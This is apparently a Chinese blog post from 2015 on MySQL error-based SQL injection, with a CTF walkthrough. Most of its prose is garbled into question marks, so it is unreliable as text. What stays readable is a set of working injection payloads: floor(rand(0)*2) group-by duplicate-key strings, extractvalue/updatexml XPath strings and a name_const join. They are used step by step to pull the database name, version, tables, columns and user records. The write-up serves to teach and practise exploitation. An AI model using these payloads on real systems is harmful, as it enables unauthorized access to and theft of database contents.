???????????SQL???????
???????????? ???????[ 2015/6/9 11:58:04 ] ?????????????
???????????????ü???????????????1??????????ctf?????????????????here
???????????????????Щ???????????????????????????????????????£?P
????0x00 ??????????
???????????????????????????????sql????????sql????ì???????????????????????????????????е???????????????????????????????????????????????????????????????
????0x01 ???????????sql??????????????????mysql??????????????????????д?????????????????????
?????????? ???? rand() ?? group by ?????
???????????1???rand()??????group by ??mysql?е?????棬???????????????group by part of rand() returns duplicate key error???bug??
????RAND() in a WHERE clause is re-evaluated every time the WHERE is executed.
????You cannot use a column with RAND() values in an ORDER BY clause, because ORDER BY would evaluate the column multiple times.
???????bug????duplicate key??????????????????????????P
?????????username=admin' and (select 1 from (select count(*)?? concat(floor(rand(0)*2)??0x23??(?????????????sql???))x from information_schema.tables group by x )a) and '1' = '1
?????????? XPATH?????
??????????????????ExtractValue()??UpdateXML()??2????????????mysql 5.1????????????XML????????????????????????????????5.1?汾???
??????sql???
????????EXTRACTVALUE (XML_document?? XPath_string);
???????????????XML_document??String??????XML??????????????????Doc
???????????????XPath_string (Xpath??????????) ??????????Xpath????????????????????
??????????????XML?з???????????????????
??????:UPDATEXML (XML_document?? XPath_string?? new_value);
???????????????XML_document??String??????XML??????????????????Doc
???????????????XPath_string (Xpath??????????) ??????????Xpath????????????????????
????????????????new_value??String??????滻????????????????????
????????????????з?????????????
?????????????????????????????XPath_string(Xpath???)????????????????????????????32λ???????????mid?????
???????1??username=admin' and (extractvalue(1?? concat(0x7e??(?????????????sql???)))) and '1'='1
???????2??username=admin' and (updatexml(1?? concat(0x7e??(?????????????sql???))??1)) and '1'='1
??????????? ????б????????????????????????????????????????????????????????????????????????????????
???????????
????payload id=330&sid=19&cid=261+and+exists(select*from+(select*from(select+name_const(@@version??0))a+join+(select+name_const(@@version??0))b)c)
????0x02 ???
?????????????????????????????°????????????
????????????????????????????? ?????r0866cplushua
????username=admin' and (select 5468 from (select count(*)?? concat(floor(rand(0)*2)??0x23??(select database()))x from information_schema.tables group by x )a) and '1' = '1
????????????????汾 ???:5.1.61-Alibaba-rds-201404-log
????username=admin' and (select 5468 from (select count(*)?? concat(floor(rand(0)*2)??0x23??(select version()))x from information_schema.tables group by x )a) and '1' = '1
???????????????? ?????log motto user ???????????????
????username=admin' and (select 5468 from (select count(*)?? concat(floor(rand(0)*2)??0x23??(select column_name from information_schema.tables where table_schema = 'r0866cplushua' limit 0??1))x from information_schema.tables group by x )a) and '1' = '1
?????????????????? ?????id username motto?????????????????user??????????????????????????????motto?????????????????
????username=admin' and (select 5468 from (select count(*)?? concat(floor(rand(0)*2)??0x23??(select column_name from information_schema.columns where table_name='motto' and table_schema = 'r0866cplushua' limit 0??1))x from information_schema.tables group by x )a) and '1' = '1
??????????????? ?????key#notfound!# (???????????XPATH?????????????????????????????????????)
????username=admin%27%20and%20(extractvalue(1??%20concat(0x7e??(SELECT%20concat(username??0x3a??motto)%20FROM%20motto%20limit%203??1))))%20and%20%271%27=%271
?????????????????????????????????????????????????????????????·?????????лл????????????????????Щ??????????????